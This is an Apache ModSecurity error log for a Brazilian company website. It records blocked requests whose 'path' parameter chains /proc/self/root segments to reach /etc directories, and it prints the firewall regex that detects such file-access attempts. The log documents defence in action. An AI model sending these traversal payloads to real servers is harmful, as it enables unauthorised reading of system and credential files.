https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:13:32.941270 2026] [:error] [pid 10189:tid 140411674785536] [client 74.7.241.31:39722] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0r3DJ3M9BSuKP7CAYeZQAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:13:41.075104 2026] [:error] [pid 10189:tid 140411691570944] [client 74.7.241.31:39392] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0r5TJ3M9BSuKP7CAYeeQAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:13:42.368190 2026] [:error] [pid 10189:tid 140411666392832] [client 74.7.241.31:53590] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0r5jJ3M9BSuKP7CAYefgAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:13:45.343532 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:53598] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0r6da6ubjKNq_cu4bXjAAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:13:57.229345 2026] [:error] [pid 21219:tid 140411699963648] [client 74.7.243.128:42632] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0r9fXLqtnMIWvjpaKdMgAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:14:01.107261 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:50416] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0r-da6ubjKNq_cu4bXmgAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:14:13.507361 2026] [:error] [pid 11167:tid 140411741927168] [client 74.7.243.128:44960] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0sBfHIg5MgXLBnicP6FAAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:14:47.667063 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.244.43:44040] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab0sJ-oXxyEfFpUF8f-D8AAAAU4"]
[Fri Mar 20 08:15:48.771806 2026] [:error] [pid 11167:tid 140411733534464] [client 74.7.241.31:53602] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0sZPHIg5MgXLBnicP6iAAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:16:13.328992 2026] [:error] [pid 10189:tid 140411582465792] [client 74.7.243.128:45884] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0sfTJ3M9BSuKP7CAYfoAAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:16:43.107860 2026] [:error] [pid 9818:tid 140411582465792] [client 74.7.243.128:35716] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0sm11pVZ5mVmJwsFM0NQAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:16:50.472881 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:49878] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0souoXxyEfFpUF8f-EMQAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 08:16:57.483644 2026] [:error] [pid 11642:tid 140411683178240] [client 74.7.243.128:60236] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0sqbninkcc-iUj5AphXQAAA4c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:16:58.791498 2026] [:error] [pid 10189:tid 140411658000128] [client 74.7.243.128:60246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0sqjJ3M9BSuKP7CAYfvQAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:18:26.255884 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.228.61:59914] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab0tAvqxLDW4GITHUkTrYgAAAQM"]
[Fri Mar 20 08:19:51.041189 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.244.43:40104] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab0tV9a6ubjKNq_cu4bYdAAAA0s"]
[Fri Mar 20 08:20:10.903155 2026] [:error] [pid 9818:tid 140411624429312] [client 74.7.243.128:51732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0tal1pVZ5mVmJwsFM0-AAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:20:14.574145 2026] [:error] [pid 31215:tid 140411557287680] [client 74.7.243.128:51284] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0tbgF0L0L-SsrnPo5sgQAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:21:20.730213 2026] [:error] [pid 11167:tid 140411725141760] [client 74.7.243.128:51300] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0tsPHIg5MgXLBnicP7ZAAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:21:24.167114 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.243.128:39790] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ttBCii7xarUs8iHZrOgAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:21:34.620226 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.243.128:39806] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0tvjJ3M9BSuKP7CAYgzwAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:21:35.902987 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.243.128:35184] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0tv_qxLDW4GITHUkTr2gAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:23:26.960919 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.228.61:37184] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab0uLta6ubjKNq_cu4bZJwAAA1I"]
[Fri Mar 20 08:23:50.330290 2026] [mime_magic:error] [pid 7235:tid 140411565680384] (70014)End of file found: [client 57.141.18.102:58842] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 08:24:51.535229 2026] [:error] [pid 21219:tid 140411599251200] [client 74.7.244.43:39418] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab0ug_XLqtnMIWvjpaKfMAAAApE"]
